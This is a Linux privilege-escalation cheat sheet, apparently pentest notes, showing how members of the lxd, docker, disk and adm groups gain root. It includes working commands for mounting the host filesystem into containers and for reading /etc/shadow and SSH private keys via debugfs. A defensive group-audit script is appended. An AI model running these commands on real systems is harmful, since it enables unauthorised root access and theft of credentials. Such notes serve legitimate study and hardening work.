Privileged Groups

LXC/LXD

Reference: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

  1. Check group membership

    $ id
    
    uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)
  2. Unzip alpine image

    $ unzip alpine.zip 
  3. Start the LXD initialization process. Consult this post for more information on each step.

    $ lxd init
  4. Import the local image

    $ lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
  5. Start a privileged container

    $ lxc init alpine r00t -c security.privileged=true
  6. Mount the host file system

    $ lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
  7. Spawn a shell inside the container instance as root

    $ lxc start r00t
    $ lxc exec r00t /bin/sh

Docker

  1. Placing a user in the docker group is essentially equivalent to granting root access, because any member can start containers that mount arbitrary host paths.

  2. We can spawn new containers with the host's /root directory mounted inside to read files or SSH keys

    $ docker run -v /root:/mnt -it ubuntu
    $ # or use /etc to retrieve /etc/shadow
    $ docker run -v /etc:/mnt -it ubuntu

Disk

Users within the disk group have read/write access to the block devices in /dev, which bypasses filesystem permissions entirely.

  1. Access /dev/sda1, typically the block device holding the root filesystem

    $ df -h #Find where "/" is mounted
    $ debugfs /dev/sda1
    debugfs: cd /root
    debugfs: ls
    debugfs: cat /root/.ssh/id_rsa
    debugfs: cat /etc/shadow
  2. Or write files

    $ debugfs -w /dev/sda1
    debugfs:  dump /tmp/asd1.txt /tmp/asd2.txt

ADM

Users within this group can read all logs stored in /var/log, which can be used to gather sensitive data recorded in log files or to enumerate user actions and running cron jobs.
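An added audit check, not part of the original page: it lists every account that is a supplementary member of the four groups above (lxd, docker, disk, adm), so a defender can review who holds root-equivalent access. It reads an /etc/group-style file passed as an argument; the sample file below is constructed for illustration, and the group names and script name are assumptions.

```shell
#!/bin/sh
# Audit which accounts belong to groups that grant root-equivalent power
# on the host (lxd, docker, disk, adm). Works on a live /etc/group or an
# offline copy collected during an investigation.

PRIVILEGED_GROUPS="lxd docker disk adm"

# Print "group:user" for every supplementary member of a privileged group
# in the given group file. The 4th colon-separated field holds the members.
# Primary-group membership (via /etc/passwd) is not covered here.
privileged_members() {
    group_file="$1"
    for g in $PRIVILEGED_GROUPS; do
        members=$(awk -F: -v grp="$g" '$1 == grp { print $4 }' "$group_file")
        if [ -n "$members" ]; then
            echo "$members" | tr ',' '\n' | while read -r user; do
                [ -n "$user" ] && echo "$g:$user"
            done
        fi
    done
}

# Constructed sample group file, not taken from any real system.
SAMPLE_GROUP_FILE="${TMPDIR:-/tmp}/group.sample.$$"
cat > "$SAMPLE_GROUP_FILE" <<'EOF'
root:x:0:
adm:x:4:syslog,alice
disk:x:6:
lxd:x:110:devops
docker:x:999:devops,bob
users:x:100:alice,bob
EOF

# Prints adm:syslog, adm:alice, lxd:devops, docker:devops, docker:bob
privileged_members "$SAMPLE_GROUP_FILE"
```

Run it against the real file with `privileged_members /etc/group`; the disk group with an empty member list is correctly skipped, and accounts in non-privileged groups such as users never appear.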
